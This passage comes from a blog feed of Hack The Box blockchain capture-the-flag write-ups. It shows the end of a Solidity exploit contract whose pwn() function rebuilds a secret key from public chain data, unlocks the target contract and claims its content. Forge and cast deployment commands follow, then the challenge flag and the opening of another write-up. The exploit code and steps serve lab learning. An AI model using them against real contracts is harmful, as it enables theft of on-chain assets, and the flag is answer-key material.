style="color:#ae81ff">1</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint128</span> key2 <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint128</span>(_generateKey(<span style="color:#ae81ff">2</span>)); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes32</span> passphrase <span style="color:#f92672">=</span> keccak256(abi.encodePacked(<span style="color:#66d9ef">uint256</span>(<span style="color:#ae81ff">0</span>))); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes8</span> secret <span style="color:#f92672">=</span> <span style="color:#66d9ef">bytes8</span>( </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes16</span>( </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint128</span>( </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint128</span>(<span style="color:#66d9ef">bytes16</span>(<span style="color:#66d9ef">bytes32</span>(<span style="color:#66d9ef">uint256</span>(<span style="color:#66d9ef">uint256</span>(passphrase) <span style="color:#f92672">^</span> key1)))) <span style="color:#f92672">^</span> key2 </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> ); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> (secret <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">32</span> <span style="color:#f92672">|</span> secret <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">16</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">pwn</span>() <span style="color:#66d9ef">external</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64</span> ownerPart <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint64</span>(<span style="color:#66d9ef">uint160</span>(target.owner())); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64</span> secretPart <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint64</span>(_magicPassword()); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes16</span> key <span style="color:#f92672">=</span> <span style="color:#66d9ef">bytes16</span>((<span style="color:#66d9ef">uint128</span>(ownerPart) <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">64</span>) <span style="color:#f92672">|</span> secretPart); </span></span><span style="display:flex;"><span> target.unlock(key); </span></span><span style="display:flex;"><span> target.claimContent(); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="deployment--execution">Deployment / Execution</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>forge create --broadcast Exploit.sol:Exploit <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> --rpc-url <span style="color:#e6db74">&#34;</span>$RPC<span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> --private-key <span style="color:#e6db74">&#34;</span>$PRIV<span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> --constructor-args <span style="color:#e6db74">&#34;</span>$TARGET<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>cast send <span style="color:#e6db74">&#34;</span>$EXPLOIT_ADDR<span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;pwn()&#34;</span> --rpc-url <span style="color:#e6db74">&#34;</span>$RPC<span style="color:#e6db74">&#34;</span> --private-key <span style="color:#e6db74">&#34;</span>$PRIV<span style="color:#e6db74">&#34;</span> </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{3ve2yth1n9_15_pu811c_1n_7h3_810ckch41n} </span></span></code></pre></div></pagevault> /posts/htb-blockchain-honor-among-thieves/ Wed, 25 Feb 2026 01:40:00 +0700 /posts/htb-blockchain-honor-among-thieves/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Honor Among Thieves</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal condition:</strong> force <code>isSolved(player) == true</code></li> </ul> <p>This challenge is a good reminder that <strong>on-chain history is public</strong> and exploitable. Instead of brute-forcing secret material, we used transaction/event intelligence and replayed the winning primitive.</p> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The contract flow leaked enough information via prior chain interactions (logs/calldata context) to recover a valid key used by the target logic.</p>